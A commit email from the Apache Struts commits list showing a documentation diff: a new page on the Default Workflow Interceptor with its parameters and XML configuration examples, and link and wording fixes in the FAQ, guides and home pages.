You are viewing a plain text version of this content. The canonical link for it is here.
Posted to commits@struts.apache.org by rg...@apache.org on 2013/05/26 23:39:00 UTC
svn commit: r863224 [2/3] - in /websites/production/struts/content:
development/2.x/docs/ release/2.3.x/docs/
Added: websites/production/struts/content/release/2.3.x/docs/default-workflow-interceptor.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/default-workflow-interceptor.html (added)
+++ websites/production/struts/content/release/2.3.x/docs/default-workflow-interceptor.html Sun May 26 21:38:59 2013
@@ -0,0 +1,219 @@
+
+<!--
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements. See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership. The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License. You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE- 2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied. See the License for the
+specific language governing permissions and limitations
+under the License.
+-->
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<HTML>
+ <HEAD>
+ <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+ <STYLE type="text/css">
+ .dp-highlighter {
+ width:95% !important;
+ }
+ </STYLE>
+ <STYLE type="text/css">
+ .footer {
+ background-image: url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+ background-repeat: repeat-x;
+ background-position: left top;
+ padding-top: 4px;
+ color: #666;
+ }
+ </STYLE>
+ <SCRIPT type="text/javascript" language="javascript">
+ var hide = null;
+ var show = null;
+ var children = null;
+
+ function init() {
+ /* Search form initialization */
+ var form = document.forms['search'];
+ if (form != null) {
+ form.elements['domains'].value = location.hostname;
+ form.elements['sitesearch'].value = location.hostname;
+ }
+
+ /* Children initialization */
+ hide = document.getElementById('hide');
+ show = document.getElementById('show');
+ children = document.all != null ?
+ document.all['children'] :
+ document.getElementById('children');
+ if (children != null) {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ }
+
+ function showChildren() {
+ children.style.display = 'block';
+ show.style.display = 'none';
+ hide.style.display = 'inline';
+ }
+
+ function hideChildren() {
+ children.style.display = 'none';
+ show.style.display = 'inline';
+ hide.style.display = 'none';
+ }
+ </SCRIPT>
+ <TITLE>Default Workflow Interceptor</TITLE>
+ <META http-equiv="Content-Type" content="text/html;charset=UTF-8"></HEAD>
+ <BODY onload="init()">
+ <TABLE border="0" cellpadding="2" cellspacing="0" width="100%">
+ <TR class="topBar">
+ <TD align="left" valign="middle" class="topBarDiv" align="left" nowrap="">
+ <A href="home.html" title="Apache Struts 2 Documentation">Apache Struts 2 Documentation</A> > <A href="home.html" title="Home">Home</A> > <A href="guides.html" title="Guides">Guides</A> > <A href="core-developers-guide.html" title="Core Developers Guide">Core Developers Guide</A> > <A href="interceptors.html" title="Interceptors">Interceptors</A> > <A href="" title="Default Workflow Interceptor">Default Workflow Interceptor</A>
+ </TD>
+ <TD align="right" valign="middle" nowrap="">
+ <FORM name="search" action="http://www.google.com/search" method="get">
+ <INPUT type="hidden" name="ie" value="UTF-8">
+ <INPUT type="hidden" name="oe" value="UTF-8">
+ <INPUT type="hidden" name="domains" value="">
+ <INPUT type="hidden" name="sitesearch" value="">
+ <INPUT type="text" name="q" maxlength="255" value="">
+ <INPUT type="submit" name="btnG" value="Google Search">
+ </FORM>
+ </TD>
+ </TR>
+ </TABLE>
+
+ <DIV id="PageContent">
+ <DIV class="pageheader" style="padding: 6px 0px 0px 0px;">
+ <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+ <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+ <DIV style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</DIV>
+ <DIV style="margin: 0px 10px 8px 10px" class="pagetitle">Default Workflow Interceptor</DIV>
+
+ <DIV class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=13995">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif" height="16" width="16" border="0" align="absmiddle" title="Edit Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=13995">Edit Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif" height="16" width="16" border="0" align="absmiddle" title="Browse Space"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=13995">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add Page"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=13995">Add Page</A>
+
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=13995">
+ <IMG src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif" height="16" width="16" border="0" align="absmiddle" title="Add News"></A>
+ <A href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=13995">Add News</A>
+ </DIV>
+ </DIV>
+
+ <DIV class="pagecontent">
+ <DIV class="wiki-content">
+ <P><P>
+An interceptor that makes sure there are not validation errors before allowing the interceptor chain to continue.
+<B>This interceptor does not perform any validation</B>.
+<P>
+<P>This interceptor does nothing if the name of the method being invoked is specified in the <B>excludeMethods</B>
+parameter. <B>excludeMethods</B> accepts a comma-delimited list of method names. For example, requests to
+<B>foo!input.action</B> and <B>foo!back.action</B> will be skipped by this interceptor if you set the
+<B>excludeMethods</B> parameter to "input, back".
+<P>
+<B>Note:</B> As this method extends off MethodFilterInterceptor, it is capable of
+deciding if it is applicable only to selective methods in the action class. This is done by adding param tags
+for the interceptor element, naming either a list of excluded method names and/or a list of included method
+names, whereby includeMethods overrides excludedMethods. A single * sign is interpreted as wildcard matching
+all methods for both parameters.
+See MethodFilterInterceptor for more info.
+<P></P>
+
+<P><B>In DefaultWorkflowInterceptor</B>
+<P>applies only when action implements com.opensymphony.xwork2.Validateable</P>
+<OL>
+ <LI>if the action class have validate{MethodName}(), it will be invoked</LI>
+ <LI>else if the action class have validateDo{MethodName}(), it will be invoked</LI>
+ <LI>no matter if 1] or 2] is performed, if alwaysInvokeValidate property of the interceptor is "true" (which is by default "true"), validate() will be invoked.</LI>
+</OL></P>
+
+
+<H2><A name="DefaultWorkflowInterceptor-Parameters"></A>Parameters</H2>
+
+<P><P>
+<UL>
+<P>
+<LI>inputResultName - Default to "input". Determine the result name to be returned when
+an action / field error is found.</LI>
+<P>
+</UL>
+<P></P>
+
+<H2><A name="DefaultWorkflowInterceptor-ExtendingtheInterceptor"></A>Extending the Interceptor</H2>
+
+<P><P>
+There are no known extension points for this interceptor.
+<P></P>
+
+<H2><A name="DefaultWorkflowInterceptor-Examples"></A>Examples</H2>
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag"><action name=<SPAN class="code-quote">"someAction"</SPAN> class=<SPAN class="code-quote">"com.examples.SomeAction"</SPAN>></SPAN>
+ <SPAN class="code-tag"><interceptor-ref name=<SPAN class="code-quote">"params"</SPAN>/></SPAN>
+ <SPAN class="code-tag"><interceptor-ref name=<SPAN class="code-quote">"validation"</SPAN>/></SPAN>
+ <SPAN class="code-tag"><interceptor-ref name=<SPAN class="code-quote">"workflow"</SPAN>/></SPAN>
+ <SPAN class="code-tag"><result name=<SPAN class="code-quote">"success"</SPAN>></SPAN>good_result.ftl<SPAN class="code-tag"></result></SPAN>
+<SPAN class="code-tag"></action></SPAN>
+
+<-- In this case myMethod as well as mySecondMethod of the action class
+ will not pass through the workflow process -->
+<SPAN class="code-tag"><action name=<SPAN class="code-quote">"someAction"</SPAN> class=<SPAN class="code-quote">"com.examples.SomeAction"</SPAN>></SPAN>
+ <SPAN class="code-tag"><interceptor-ref name=<SPAN class="code-quote">"params"</SPAN>/></SPAN>
+ <SPAN class="code-tag"><interceptor-ref name=<SPAN class="code-quote">"validation"</SPAN>/></SPAN>
+ <SPAN class="code-tag"><interceptor-ref name=<SPAN class="code-quote">"workflow"</SPAN>></SPAN>
+ <SPAN class="code-tag"><param name=<SPAN class="code-quote">"excludeMethods"</SPAN>></SPAN>myMethod,mySecondMethod<SPAN class="code-tag"></param></SPAN>
+ <SPAN class="code-tag"></interceptor-ref name=<SPAN class="code-quote">"workflow"</SPAN>></SPAN>
+ <SPAN class="code-tag"><result name=<SPAN class="code-quote">"success"</SPAN>></SPAN>good_result.ftl<SPAN class="code-tag"></result></SPAN>
+<SPAN class="code-tag"></action></SPAN>
+
+<-- In this case, the result named <SPAN class="code-quote">"error"</SPAN> will be used when
+ an action / field error is found -->
+<-- The Interceptor will only be applied for myWorkflowMethod method of action
+ classes, since this is the only included method while any others are excluded -->
+<SPAN class="code-tag"><action name=<SPAN class="code-quote">"someAction"</SPAN> class=<SPAN class="code-quote">"com.examples.SomeAction"</SPAN>></SPAN>
+ <SPAN class="code-tag"><interceptor-ref name=<SPAN class="code-quote">"params"</SPAN>/></SPAN>
+ <SPAN class="code-tag"><interceptor-ref name=<SPAN class="code-quote">"validation"</SPAN>/></SPAN>
+ <SPAN class="code-tag"><interceptor-ref name=<SPAN class="code-quote">"workflow"</SPAN>></SPAN>
+ <SPAN class="code-tag"><param name=<SPAN class="code-quote">"inputResultName"</SPAN>></SPAN>error<SPAN class="code-tag"></param></SPAN>
+ <SPAN class="code-tag"><param name=<SPAN class="code-quote">"excludeMethods"</SPAN>></SPAN>*<SPAN class="code-tag"></param></SPAN>
+ <SPAN class="code-tag"><param name=<SPAN class="code-quote">"includeMethods"</SPAN>></SPAN>myWorkflowMethod<SPAN class="code-tag"></param></SPAN>
+ <SPAN class="code-tag"></interceptor-ref></SPAN>
+ <SPAN class="code-tag"><result name=<SPAN class="code-quote">"success"</SPAN>></SPAN>good_result.ftl<SPAN class="code-tag"></result></SPAN>
+<SPAN class="code-tag"></action></SPAN>
+
+</PRE>
+</DIV></DIV>
+ </DIV>
+
+
+ </DIV>
+ </DIV>
+ <DIV class="footer">
+ Generated by
+ <A href="http://www.atlassian.com/confluence/">Atlassian Confluence</A> (Version: 3.4.9 Build: 2042 Feb 14, 2011)
+ <A href="http://could.it/autoexport/">Auto Export Plugin</A> (Version: 1.0.0-dkulp)
+ </DIV>
+ </BODY>
+</HTML>
\ No newline at end of file
Modified: websites/production/struts/content/release/2.3.x/docs/faqs.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/faqs.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/faqs.html Sun May 26 21:38:59 2013
@@ -123,12 +123,13 @@ under the License.
<DIV class="pagecontent">
<DIV class="wiki-content">
- <DIV class="panelMacro"><TABLE class="tipMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>Adding New FAQs</B><BR>Each FAQ should be cross-referenced from a relevant page in one of the guides. (If a relevant page in the guide is missing, then we probably need to create one!) Each question should be a new page. Answers should be concise and focused. If an answer seems long, or seems like it could relate to more than one section, then the question might be addressing more than one concern.
+ <DIV class="panelMacro"><TABLE class="tipMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>Adding New FAQs</B><BR>Each FAQ should be cross-referenced from a relevant page in one of the guides. (If a relevant page in the guide is missing, then we probably need to create one!) Each question should be a new page. Answers should be concise and focused. If an answer seems long, or seems like it could relate to more than one section, then the question might be addressing more than one concern.
<P>FAQs can also be "mini-HOWTOs". As long as the question and answer are focused on a single concern, length is not an issue.</P></TD></TR></TABLE></DIV>
-<H3><A name="FAQs-Migrating"></A>Migrating </H3>
+
+<H3><A name="FAQs-Migrating"></A>Migrating</H3>
<UL>
<LI>See the <A href="migration-guide.html" title="Migration Guide">Migration Guide</A></LI>
@@ -138,7 +139,7 @@ under the License.
<H3><A name="FAQs-General"></A>General</H3>
<UL>
- <LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=Where%20do%20we%20get%20the%20latest%20version%20of%20the%20framework&linkCreation=true&fromPageId=14182" class="createlink">Where do we get the latest version of the framework</A>?</LI>
+ <LI><A href="where-do-we-get-the-latest-version-the-framework.html" title="Where do we get the latest version the framework">Where do we get the latest version the framework</A>?</LI>
<LI><A href="what-are-some-of-the-frameworks-best-features.html" title="What are some of the framework's best features">What are some of the framework's best features</A>?</LI>
<LI><A href="what-are-the-fundamental-differences-between-struts-and-jsf.html" title="What are the fundamental differences between Struts and JSF">What are the fundamental differences between Struts and JSF</A>?</LI>
<LI><A href="can-you-suggest-an-elevator-pitch.html" title="Can you suggest an elevator pitch">Can you suggest an elevator pitch</A>?</LI>
@@ -150,12 +151,12 @@ under the License.
<UL>
<LI><A href="how-can-we-display-dynamic-or-static-images-that-can-be-provided-as-an-array-of-bytes.html" title="How can we display dynamic or static images that can be provided as an array of bytes">How can we display dynamic or static images that can be provided as an array of bytes</A>?</LI>
<LI><A href="how-can-we-return-a-text-string-as-the-response.html" title="How can we return a text string as the response">How can we return a text string as the response</A>?</LI>
- <LI><A href="how-can-we-test-applications.html" title="How can we test applications?">How can we test applications?</A></LI>
+ <LI><A href="how-can-we-test-applications.html" title="How can we test applications?">How can we test applications?</A></LI>
<LI><A href="how-can-we-test-actions.html" title="How can we test Actions">How can we test Actions</A>?</LI>
<LI><A href="how-do-we-upload-files.html" title="How do we upload files">How do we upload files</A>?</LI>
<LI><A href="how-do-we-download-files-within-the-framework.html" title="How do we download files within the framework">How do we download files within the framework</A>?</LI>
- <LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=How%20can%20we%20force%20the%20Action%20Mappings%20(i.e.%20struts.xml)%20to%20reload&linkCreation=true&fromPageId=14182" class="createlink">How can we force the Action Mappings (i.e. struts.xml) to reload</A>?</LI>
- <LI><A href="how-can-i-test-my-action-output-validation-or-the-action-execution-outside-a-container.html" title="How can I test my action output, validation or the action execution outside a container?">How can I test my action output, validation or the action execution outside a container?</A></LI>
+ <LI><A href="how-can-we-force-the-action-mappings-strutsxml-to-reload.html" title="How can we force the Action Mappings (struts.xml) to reload">How can we force the Action Mappings (struts.xml) to reload</A>?</LI>
+ <LI><A href="how-can-i-test-my-action-output-validation-or-the-action-execution-outside-a-container.html" title="How can I test my action output, validation or the action execution outside a container?">How can I test my action output, validation or the action execution outside a container?</A></LI>
</UL>
@@ -172,23 +173,23 @@ under the License.
<UL>
<LI><A href="how-do-we-get-access-to-the-session.html" title="How do we get access to the session">How do we get access to the session</A>?</LI>
- <LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=How%20do%20we%20invalidate%20the%20session&linkCreation=true&fromPageId=14182" class="createlink">How do we invalidate the session</A>?</LI>
+ <LI><A href="how-do-we-get-invalidate-the-session.html" title="How do we get invalidate the session">How do we get invalidate the session</A>?</LI>
<LI><A href="how-can-we-access-the-httpservletrequest.html" title="How can we access the HttpServletRequest">How can we access the HttpServletRequest</A>?</LI>
<LI><A href="how-can-we-access-the-httpservletresponse.html" title="How can we access the HttpServletResponse">How can we access the HttpServletResponse</A>?</LI>
<LI><A href="how-can-we-access-request-parameters-passed-into-an-action.html" title="How can we access request parameters passed into an Action">How can we access request parameters passed into an Action</A>?</LI>
<LI><A href="how-do-we-access-static-parameters-from-an-action.html" title="How do we access static parameters from an Action">How do we access static parameters from an Action</A>?</LI>
<LI><A href="can-we-access-an-actions-result.html" title="Can we access an Action's Result">Can we access an Action's Result</A>?</LI>
- <LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=How%20do%20I%20obtain%20security%20details%20(e.g.%20JAAS)&linkCreation=true&fromPageId=14182" class="createlink">How do I obtain security details (e.g. JAAS)</A>?</LI>
- <LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=How%20do%20we%20access%20the%20ActionInvocation,%20action%20name%20or%20namespace%20from%20a%20view&linkCreation=true&fromPageId=14182" class="createlink">How do we access the ActionInvocation, action name or namespace from a view</A></LI>
+ <LI><A href="how-do-i-obtain-security-details-jaas.html" title="How do I obtain security details (JAAS)">How do I obtain security details (JAAS)</A>?</LI>
+ <LI><A href="how-do-we-access-the-action-invocation-action-name-or-namespace-from-a-view.html" title="How do we access the Action Invocation, action name or namespace from a view">How do we access the Action Invocation, action name or namespace from a view</A>?</LI>
</UL>
<H3><A name="FAQs-PerPageSettings"></A>Per-Page Settings</H3>
<UL>
- <LI><A href="can-i-change-theme-on-a-per-page-basis.html" title="Can I change theme on a per-page basis">Can I change theme on a per-page basis</A>?</LI>
- <LI><A href="can-i-change-templatedir-on-a-per-page-basis.html" title="Can I change templateDir on a per-page basis">Can I change templateDir on a per-page basis</A>?</LI>
- <LI><A href="can-i-change-templatesuffix-on-a-per-page-basis.html" title="Can I change templateSuffix on a per-page basis">Can I change templateSuffix on a per-page basis</A>?</LI>
+ <LI><A href="can-i-change-theme-on-a-per-page-basis.html" title="Can I change theme on a per-page basis">Can I change theme on a per-page basis</A>?</LI>
+ <LI><A href="can-i-change-templatedir-on-a-per-page-basis.html" title="Can I change templateDir on a per-page basis">Can I change templateDir on a per-page basis</A>?</LI>
+ <LI><A href="can-i-change-templatesuffix-on-a-per-page-basis.html" title="Can I change templateSuffix on a per-page basis">Can I change templateSuffix on a per-page basis</A>?</LI>
</UL>
@@ -206,7 +207,7 @@ under the License.
<UL>
<LI><A href="why-is-my-action-returning-input-when-the-form-is-filled-out-correctly.html" title="Why is my action returning "input" when the form is filled out correctly">Why is my action returning "input" when the form is filled out correctly</A>?</LI>
<LI><A href="how-do-i-use-messages-from-within-the-validator.html" title="How do I use messages from within the validator">How do I use messages from within the validator</A>?</LI>
- <LI><A href="how-can-i-fix-the-attribute-short-circuit-error-message.html" title="How can I fix the "Attribute 'short-circuit'" error message">How can I fix the "Attribute 'short-circuit'" error message</A>?</LI>
+ <LI><A href="how-can-i-fix-the-attribute-short-circuit-error-message.html" title="How can I fix the "Attribute 'short-circuit'" error message">How can I fix the "Attribute 'short-circuit'" error message</A>?</LI>
<LI><A href="how-do-we-repopulate-controls-when-validation-fails.html" title="How do we repopulate controls when validation fails">How do we repopulate controls when validation fails</A>?</LI>
<LI><A href="how-do-i-unit-test-my-actions-validation-logic.html" title="How do I unit test my action's validation logic">How do I unit test my action's validation logic</A>?</LI>
<LI><A href="why-does-ww-ignore-my-message-when-its-enclosed-in-cdata.html" title="Why does WW ignore my message when its enclosed in CDATA">Why does WW ignore my message when its enclosed in CDATA</A>?</LI>
@@ -218,10 +219,10 @@ under the License.
<UL>
<LI><A href="how-do-we-change-locales.html" title="How do we change locales">How do we change locales</A>?</LI>
<LI><A href="how-do-i-set-a-global-resource-bundle.html" title="How do I set a global resource bundle">How do I set a global resource bundle</A>?</LI>
- <LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=How%20do%20I%20decouple%20XWork%20LocalizedTextUtil%20global%20resource%20bundle%20loading%20from%20servlets&linkCreation=true&fromPageId=14182" class="createlink">How do I decouple XWork LocalizedTextUtil global resource bundle loading from servlets</A>?</LI>
+ <LI><A href="how-do-i-decouple-xwork-localizedtextutil-global-resource-bundle-loading-from-serlvets.html" title="How do I decouple XWork LocalizedTextUtil global resource bundle loading from serlvets">How do I decouple XWork LocalizedTextUtil global resource bundle loading from serlvets</A>?</LI>
<LI><A href="how-do-i-add-i18n-to-a-ui-tag-like-the-textfield-tag.html" title="How do I add I18N to a UI tag, like the textfield tag">How do I add I18N to a UI tag, like the textfield tag</A>?</LI>
<LI><A href="can-i-add-i18n-outside-the-actions-context.html" title="Can I add I18N outside the Action's context">Can I add I18N outside the Action's context</A>?</LI>
- <LI><A href="how-to-support-utf-8-uriencoding-with-tomcat.html" title="How to support UTF-8 URIEncoding with Tomcat">How to support UTF-8 URIEncoding with Tomcat</A>?</LI>
+ <LI><A href="how-to-support-utf-8-uriencoding-with-tomcat.html" title="How to support UTF-8 URIEncoding with Tomcat">How to support UTF-8 URIEncoding with Tomcat</A>?</LI>
<LI><A href="how-do-i-enable-encoding-in-my-forms.html" title="How do I enable encoding in my forms">How do I enable encoding in my forms</A>?</LI>
<LI><A href="how-to-escape-special-chars-in-resource-bundles.html" title="How to escape special chars in resource bundles">How to escape special chars in resource bundles</A>?</LI>
</UL>
@@ -248,15 +249,15 @@ under the License.
<LI><A href="why-do-the-form-tags-put-table-tags-around-controls.html" title="Why do the form tags put table tags around controls">Why do the form tags put table tags around controls</A>?</LI>
<LI><A href="how-can-i-put-a-string-literal-in-a-javascript-call-for-instance-in-an-onchange-attribute.html" title="How can I put a String literal in a Javascript call, for instance in an onChange attribute">How can I put a String literal in a Javascript call, for instance in an onChange attribute</A>?</LI>
<LI><A href="why-wont-the-if-tag-evaluate-a-one-char-string.html" title="Why won't the 'if' tag evaluate a one char string">Why won't the 'if' tag evaluate a one char string</A>?</LI>
- <LI><A href="why-does-freemarker-complain-that-theres-an-error-in-my-user-directive-when-i-used-jsp-tag.html" title="Why does FreeMarker complain that there's an error in my user-directive when I used JSP Tag">Why does FreeMarker complain that there's an error in my user-directive when I used JSP Tag</A>?</LI>
+ <LI><A href="why-does-freemarker-complain-that-theres-an-error-in-my-user-directive-when-i-used-jsp-tag.html" title="Why does FreeMarker complain that there's an error in my user-directive when I used JSP Tag">Why does FreeMarker complain that there's an error in my user-directive when I used JSP Tag</A>?</LI>
<LI><A href="can-an-action-tag-run-another-method-apart-from-the-default-execute-method.html" title="Can an action tag run another method apart from the default execute method">Can an action tag run another method apart from the default execute method</A>?</LI>
<LI><A href="why-didnt-my-action-tag-get-executed-when-i-have-validation-errors.html" title="Why didn't my action tag get executed when I have validation errors">Why didn't my action tag get executed when I have validation errors</A>?</LI>
<LI><A href="why-are-request-parameters-appended-to-our-hyperlinks.html" title="Why are request parameters appended to our hyperlinks">Why are request parameters appended to our hyperlinks</A>?</LI>
<LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=why%20doesn't%20the%20if%20tag%20evaluate%20params%20properly&linkCreation=true&fromPageId=14182" class="createlink">Why doesn't the if tag evaluate test="#parameters.someParam ... " properly</A></LI>
<LI><A href="how-do-i-render-a-single-radio-button.html" title="How do I render a single radio button">How do I render a single radio button</A>?</LI>
- <LI><A href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&title=Why%20do%20I%20get%20a%20javax.el.ELException%20when%20using%20OGNL%20with%20JSP%202.1%3F&linkCreation=true&fromPageId=14182" class="createlink">Why do I get a javax.el.ELException when using OGNL with JSP 2.1?</A></LI>
- <LI><A href="why-cant-i-use-jstl-style-el-expressions-in-struts-tags.html" title="Why can't I use JSTL-style EL expressions in Struts tags?">Why can't I use JSTL-style EL expressions in Struts tags?</A></LI>
- <LI><A href="how-can-i-iterate-over-a-range-like-with-jstls-foreach-tag.html" title="How can I iterate over a range, like with JSTL's forEach tag?">How can I iterate over a range, like with JSTL's forEach tag?</A></LI>
+ <LI><A href="why-do-i-get-a-javaxelelexception-when-using-ognl-with-jsp21.html" title="Why do I get a javax.el.ELException when using OGNL with JSP2.1?">Why do I get a javax.el.ELException when using OGNL with JSP2.1?</A></LI>
+ <LI><A href="why-cant-i-use-jstl-style-el-expressions-in-struts-tags.html" title="Why can't I use JSTL-style EL expressions in Struts tags?">Why can't I use JSTL-style EL expressions in Struts tags?</A></LI>
+ <LI><A href="how-can-i-iterate-over-a-range-like-with-jstls-foreach-tag.html" title="How can I iterate over a range, like with JSTL's forEach tag?">How can I iterate over a range, like with JSTL's forEach tag?</A></LI>
</UL>
@@ -267,7 +268,7 @@ under the License.
</UL>
-<H3><A name="FAQs-Spring"></A>Spring </H3>
+<H3><A name="FAQs-Spring"></A>Spring</H3>
<UL>
<LI><A href="how-can-we-create-our-action-objects-from-the-spring-configuration.html" title="How can we create our Action objects from the Spring configuration">How can we create our Action objects from the Spring configuration</A>?</LI>
@@ -295,7 +296,7 @@ under the License.
<LI><A href="weblogic-81.html" title="Weblogic 8.1">Weblogic 8.1</A></LI>
<LI><A href="jrockit.html" title="JRockit">JRockit</A></LI>
<LI><A href="multiple-struts-2-wars-in-a-single-ear.html" title="Multiple Struts 2 wars in a single ear">Multiple Struts 2 wars in a single ear</A></LI>
- <LI><A href="google-app-engine-gae.html" title="Google App Engine (GAE)">Google App Engine (GAE)</A></LI>
+ <LI><A href="google-app-engine-gae.html" title="Google App Engine (GAE)">Google App Engine (GAE)</A></LI>
</UL>
@@ -319,7 +320,7 @@ under the License.
</UL>
-<H3><A name="FAQs-Migrating"></A>Migrating </H3>
+<H3><A name="FAQs-Migrating"></A>Migrating</H3>
<UL>
<LI><A href="why-is-my-action-unavailable.html" title="Why is my action unavailable">Why is my action unavailable</A>?</LI>
@@ -327,10 +328,9 @@ under the License.
-
<H2><A name="FAQs-Errata%3F"></A>Errata?</H2>
-<DIV class="panelMacro"><TABLE class="tipMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>To suggest a change or a correction to any part of the documentation, log in and leave a comment on the appropriate page. We are always looking for <A href="http://struts.apache.org/2.x/docs/contributors-guide.html" class="external-link" rel="nofollow">help with the documentation!</A></TD></TR></TABLE></DIV>
+<DIV class="panelMacro"><TABLE class="tipMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>To suggest a change or a correction to any part of the documentation, log in and leave a comment on the appropriate page. We are always looking for <A href="http://struts.apache.org/2.x/docs/contributors-guide.html" class="external-link" rel="nofollow">help with the documentation!</A></TD></TR></TABLE></DIV>
<H2><A name="FAQs-Next%3ACookbook"></A>Next: <A href="cookbook.html" title="Cookbook">Cookbook</A></H2>
</DIV>
Modified: websites/production/struts/content/release/2.3.x/docs/guides.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/guides.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/guides.html Sun May 26 21:38:59 2013
@@ -352,6 +352,9 @@ under the License.
<H3><A name="Guides-VersionNotes2.3.x"></A>Version Notes 2.3.x</H3>
<UL>
+ <LI><A href="version-notes-2315.html" title="Version Notes 2.3.15">Version Notes 2.3.15</A></LI>
+ <LI><A href="version-notes-23142.html" title="Version Notes 2.3.14.2">Version Notes 2.3.14.2</A></LI>
+ <LI><A href="version-notes-23141.html" title="Version Notes 2.3.14.1">Version Notes 2.3.14.1</A></LI>
<LI><A href="version-notes-2314.html" title="Version Notes 2.3.14">Version Notes 2.3.14</A></LI>
<LI><A href="version-notes-2312.html" title="Version Notes 2.3.12">Version Notes 2.3.12</A></LI>
<LI><A href="version-notes-238.html" title="Version Notes 2.3.8">Version Notes 2.3.8</A></LI>
Modified: websites/production/struts/content/release/2.3.x/docs/home.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/home.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/home.html Sun May 26 21:38:59 2013
@@ -138,7 +138,7 @@ under the License.
<DIV class="panelMacro"><TABLE class="tipMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>Have a suggestion, correction, or improvement? <A href="http://cwiki.apache.org/confluence/display/WW/Home" class="external-link" rel="nofollow">Log in</A> and leave a comment on the appropriate page or file a ticket against the Struts 2 documentation. <A href="contributors-guide.html" title="Contributors Guide">We're always looking for help!</A></TD></TR></TABLE></DIV>
-<P>We've started planning the next version of Struts aka Struts 3 which will break backward compatibility, if you want to join please add your two cents <A href="struts-3.html" title="Struts 3">here</A>.</P>
+<DIV class="panelMacro"><TABLE class="noteMacro"><COLGROUP><COL width="24"><COL></COLGROUP><TR><TD valign="top"><IMG src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif" width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>We've started planning the next version of Struts aka Struts 3 (or 2.5) which will break backward compatibility, if you want to join please add your two cents <A href="struts-next.html" title="Struts Next">here</A>.</TD></TR></TABLE></DIV>
<H2><A name="Home-GettingStarted"></A>Getting Started</H2>
@@ -215,7 +215,7 @@ under the License.
<A href="other-resources.html" title="Other Resources">Other Resources</A>
<SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
<BR>
- <A href="struts-3.html" title="Struts 3">Struts 3</A>
+ <A href="struts-next.html" title="Struts Next">Struts Next</A>
<SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
<BR>
</DIV>
Modified: websites/production/struts/content/release/2.3.x/docs/index.html
==============================================================================
--- websites/production/struts/content/release/2.3.x/docs/index.html (original)
+++ websites/production/struts/content/release/2.3.x/docs/index.html Sun May 26 21:38:59 2013
@@ -138,7 +138,7 @@ under the License.
